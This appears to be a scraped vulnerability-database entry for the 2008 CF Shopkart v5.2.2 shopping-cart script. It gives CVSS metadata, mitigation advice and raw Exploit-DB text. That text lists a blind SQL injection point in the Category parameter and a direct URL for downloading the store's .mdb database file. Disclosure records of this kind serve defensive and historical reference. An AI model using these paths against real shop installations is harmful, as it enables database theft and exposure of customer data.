CF SHOPKART V5.2.2

vendor:

CF SHOPKART V5.2.2

by:

AlpHaNiX

8.8

CVSS

HIGH

Blind SQL Injection & Database Disclosure

89,564

CWE

Product Name: CF SHOPKART V5.2.2

Affected Version From: V5.2.2

Affected Version To: V5.2.2

Patch Exists: YES

Related CWE: N/A

CPE: a:cf_shopkart:cf_shopkart_v5.2.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

CF SHOPKART V5.2.2 is vulnerable to Blind SQL Injection and Database Disclosure. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. This will allow the attacker to gain access to the underlying database and disclose sensitive information.

Mitigation:

Apply the latest security patches and ensure that all user input is properly sanitized and validated.

Source

Exploit-DB raw data:

###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : CF SHOPKART V5.2.2
#download : http://www.cfshopkart.com/dl/cfshopkart522.rar
#Demo     : http://www.cfshopkart.com/demos/cfshopkart522/

###########################################################################

#Exploits :

--=[BLIND SQL INJECTION]=--
http://www.cfshopkart.com/demos/cfshopkart522/index.cfm?carttoken=86347665727815&Action=ViewCategory&Category=(bl!nd)


--=[DATABASE DISCLOSURE]=--
http://www.cfshopkart.com/demos/cfshopkart522/databases/cfshopkart52.mdb

#Greetz For DraGoBalti`

###########################################################################

# milw0rm.com [2008-12-10]